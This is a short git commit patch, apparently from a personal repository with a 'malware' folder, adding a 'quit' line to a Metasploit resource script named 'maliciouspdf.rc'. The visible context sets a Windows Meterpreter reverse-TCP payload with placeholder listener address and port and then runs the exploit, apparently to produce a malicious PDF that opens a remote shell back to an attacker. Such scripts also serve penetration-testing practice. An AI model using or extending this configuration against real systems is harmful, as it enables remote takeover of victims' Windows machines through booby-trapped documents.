From 317618f6ee48b3d77946809f96adc2ccd57f91fc Mon Sep 17 00:00:00 2001 From: jerome Date: Thu, 26 Sep 2024 17:28:04 +0200 Subject: malicious.pdf --- malware/maliciouspdf.rc | 1 + 1 file changed, 1 insertion(+) (limited to 'malware/maliciouspdf.rc') diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc index 71c6c09..eb8ca96 100644 --- a/malware/maliciouspdf.rc +++ b/malware/maliciouspdf.rc @@ -4,3 +4,4 @@ set PAYLOAD windows/meterpreter/reverse_tcp set LHOST listening_ip set LPORT tcp_port exploit +quit -- cgit v1.2.3